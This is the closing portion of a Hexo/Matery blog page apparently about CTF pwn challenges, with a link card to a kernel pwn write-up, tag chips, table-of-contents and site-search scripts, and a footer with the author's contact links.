                    <a href="/tags/pwn/">
                        <span class="chip bg-color">pwn</span>
                    </a>
                    
                    <a href="/tags/grpc/">
                        <span class="chip bg-color">grpc</span>
                    </a>
                    
                    <a href="/tags/golang/">
                        <span class="chip bg-color">golang</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2024/03/18/ciscn-babydriver-kernel-pwn-jie-ti-yi-ban-guo-cheng/ciscn-babydriver-kernel-pwn-jie-ti-yi-ban-guo-cheng/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/Steel%20Gray.jpg" class="responsive-img" alt="ciscn_babydriver-kernel_pwn解题一般过程">
                        
                        <span class="card-title">ciscn_babydriver-kernel_pwn解题一般过程</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            从ciscn_babydriver学习kernel pwn的一般解题过程
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2024-03-18
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/kernel/" class="post-category">
                                    kernel
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/kernel/">
                        <span class="chip bg-color">kernel</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2024</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">StarrySky</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">118.5k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/starrysky1004" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:starrysky20041005@gmail.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2726736810" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2726736810" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>









    <a href="https://space.bilibili.com/85923475" class="tooltipped" target="_blank" data-tooltip="关注我的bilibili" data-position="top" data-delay="50">
        <i class="fas fa-video"></i>
    </a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":260,"height":300},"mobile":{"show":true},"log":false});</script></body>

</html>
